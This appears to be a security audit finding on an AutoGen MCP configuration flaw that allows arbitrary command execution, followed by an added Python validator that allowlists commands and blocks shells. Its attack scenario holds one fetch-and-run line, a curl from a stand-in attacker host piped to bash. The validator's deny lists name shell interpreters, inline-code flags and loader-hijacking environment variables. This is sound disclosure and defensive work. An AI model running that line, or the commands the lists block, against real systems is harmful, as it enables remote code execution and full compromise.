@orenyomtov
Created April 14, 2026 06:58
CRITICAL: MCP StdioServerParams Allows Arbitrary Command Execution

Finding F004: MCP StdioServerParams Allows Arbitrary Command Execution

Severity: CRITICAL

Location

python/packages/autogen-ext/src/autogen_ext/tools/mcp/_config.py
python/packages/autogen-ext/src/autogen_ext/tools/mcp/_workbench.py

Description

StdioServerParams allows specifying arbitrary commands, arguments and environment variables for MCP server connections. When this config is deserialized and handed to stdio_client(), the command is executed exactly as given, with no validation in between:

# From _workbench.py
if isinstance(server_params, StdioServerParams):
    stdio_params = StdioServerParameters(
        command=server_params.command,  # Arbitrary command
        args=server_params.args,        # Arbitrary arguments
        env=server_params.env           # Arbitrary environment variables
    )
    async with stdio_client(stdio_params) as (read, write):
        ...

Attack Scenario

  1. Attacker controls team_config in WebSocket message
  2. Config contains malicious StdioServerParams:
    {
      "type": "StdioServerParams",
      "command": "bash",
      "args": ["-c", "curl attacker.com/shell.sh | bash"]
    }
  3. Arbitrary command executes on the system

Risk Assessment

  • Severity: CRITICAL
  • Impact: Complete system compromise
  • Likelihood: HIGH (in AutoGen Studio where user controls team configs)

Existing Mitigations

  1. Trusted namespace validation (but MCP server params don't use ComponentLoader)
  2. Documentation warns: "Only connect to trusted MCP servers"

Recommendations

  1. Add command validation/allowlisting for StdioServerParams
  2. Default to blocking shell commands (bash, sh, python -c, etc.)
  3. Add explicit security configuration for allowed MCP servers
  4. Consider removing StdioServerParams from AutoGen Studio UI
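
As an added example (not code from the AutoGen project), a validator in the shape of recommendations 1 and 2 that runs over a config with the StdioServerParams fields (command, args, env) before anything reaches stdio_client(). The StdioConfig stand-in, the deny sets, the allowlist and the sample commands are assumptions, not project API.

```python
# Added example, not AutoGen code: allowlist + shell-blocking validation for
# stdio MCP server configs, applied before the config is turned into
# StdioServerParameters and passed to stdio_client().
from __future__ import annotations

import os.path
from dataclasses import dataclass, field

# Interpreters that turn "command + args" directly into arbitrary code execution.
SHELL_LIKE = {"bash", "sh", "zsh", "dash", "cmd", "cmd.exe", "powershell", "pwsh"}
# Flags that evaluate inline code for otherwise legitimate interpreters.
CODE_EVAL_FLAGS = {"python": {"-c"}, "python3": {"-c"}, "node": {"-e", "--eval"}}
# Env overrides that hijack a trusted binary at load time (assumed deny set).
DENIED_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "NODE_OPTIONS"}


@dataclass
class StdioConfig:
    """Stand-in for StdioServerParams; field names mirror the finding above."""
    command: str
    args: list[str] = field(default_factory=list)
    env: dict[str, str] = field(default_factory=dict)


class UnsafeServerConfig(ValueError):
    """Raised when a config must not be launched."""


def validate_stdio_config(cfg: StdioConfig, allowlist: set[str]) -> StdioConfig:
    """Default-deny: the command must be on the operator allowlist (exact
    string, ideally an absolute path), must not be a shell, must not carry an
    inline-code flag, and must not override loader-controlling env vars."""
    name = os.path.basename(cfg.command)
    if name in SHELL_LIKE:
        raise UnsafeServerConfig(f"shell interpreter not permitted: {cfg.command}")
    if cfg.command not in allowlist:
        raise UnsafeServerConfig(f"command not in allowlist: {cfg.command}")
    for flag in CODE_EVAL_FLAGS.get(name, set()):
        if flag in cfg.args:
            raise UnsafeServerConfig(f"inline code flag {flag!r} not permitted")
    bad_env = DENIED_ENV.intersection(cfg.env)
    if bad_env:
        raise UnsafeServerConfig(f"env override not permitted: {sorted(bad_env)}")
    return cfg


def is_safe(cfg: StdioConfig, allowlist: set[str]) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_stdio_config(cfg, allowlist)
        return True
    except UnsafeServerConfig:
        return False
```

The allowlist is operator-supplied configuration (recommendation 3); an empty allowlist rejects every stdio server, which is the safe default for a UI where users author team configs.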